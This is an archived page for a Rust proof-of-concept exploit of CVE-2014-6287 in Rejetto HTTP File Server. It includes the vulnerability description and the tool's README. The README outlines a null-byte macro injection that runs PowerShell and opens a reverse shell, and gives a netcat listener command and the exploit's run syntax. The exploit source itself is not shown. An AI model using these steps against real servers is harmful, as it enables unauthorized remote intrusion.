Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2014-6287 PoC — Rejetto HTTP File Server‘ParserLib.pas’代码注入漏洞

Source
https://github.com/nika0x38/CVE-2014-6287
Associated Vulnerability
Title:Rejetto HTTP File Server‘ParserLib.pas’代码注入漏洞 (CVE-2014-6287)
Description:HTTP File Server是一款专为个人用户所设计的HTTP文件服务器,它提供虚拟档案系统,支持新增、移除虚拟档案资料夹等。 Rejetto HTTP File Server 2.3c及之前版本中的parserLib.pas文件中的‘findMacroMarker’函数中存在安全漏洞,该漏洞源于parserLib.pas文件没有正确处理空字节。远程攻击者可借助搜索操作中的‘%00’序列利用该漏洞执行任意程序。
Description
A Rust implementation of the CVE-2014-6287 exploit targeting Rejetto HTTP File Server (HFS) versions 2.3x before 2.3c.
Readme
# CVE-2014-6287 - Rejetto HTTP File Server RCE Exploit

[![Rust](https://img.shields.io/badge/rust-%23000000.svg?style=for-the-badge&logo=rust&logoColor=white)](https://www.rust-lang.org/)
[![Security](https://img.shields.io/badge/Security-CVE--2014--6287-red?style=for-the-badge)](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6287)

A Rust implementation of the CVE-2014-6287 exploit targeting Rejetto HTTP File Server (HFS) versions 2.3x before 2.3c.

## Vulnerability Overview

**CVE-2014-6287** is a critical remote code execution vulnerability in Rejetto HTTP File Server (HFS).

### Technical Details

- **Affected Software**: Rejetto HTTP File Server (HFS) 2.3x before 2.3c
- **Vulnerability Type**: Remote Code Execution (RCE)
- **CVSS Score**: 10.0 (Critical)
- **CWE**: CWE-94 (Improper Control of Generation of Code)

### Description

The `findMacroMarker` function in `parserLib.pas` in Rejetto HTTP File Server allows remote attackers to execute arbitrary programs via a `%00` sequence in a search action. This vulnerability enables attackers to bypass input validation and inject malicious code that gets executed on the target system.

The exploit works by:
1. Crafting a malicious search query containing a null byte (`%00`)
2. Injecting PowerShell commands within macro delimiters `{.` and `.}`
3. The server processes the macro and executes the embedded PowerShell code
4. Establishing a reverse shell connection back to the attacker

## Usage

### Step 1: Set up a Netcat Listener

Before executing the exploit, set up a listener on your attacking machine to catch the reverse shell:

```bash
# Replace <LPORT> with your desired listening port
nc -lvnp <LPORT>
```
### Step 2: Execute the Exploit

```bash
cargo run -- -l <LHOST> -p <LPORT> -r <RHOST> [-t <RPORT>]
```

#### Required Parameters:
- `-l, --lhost <LHOST>`: Your local IP address (attacker machine)
- `-p, --lport <LPORT>`: Your local port for the reverse shell
- `-r, --rhost <RHOST>`: Target IP address (vulnerable HFS server)

#### Optional Parameters:
- `-t, --rport <RPORT>`: Target port (default: 80)


## Disclaimer

This tool is for educational and authorized penetration testing purposes only. Use responsibly and only on systems you own or have explicit permission to
File Snapshot

 [4.0K]  /data/pocs/a41aa230c51e0916fd252e1dc748a14fa1a73db7
├── [ 45K]  Cargo.lock
├── [ 218]  Cargo.toml
├── [2.2K]  README.md
└── [4.0K]  src
    └── [2.6K]  main.rs

1 directory, 4 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.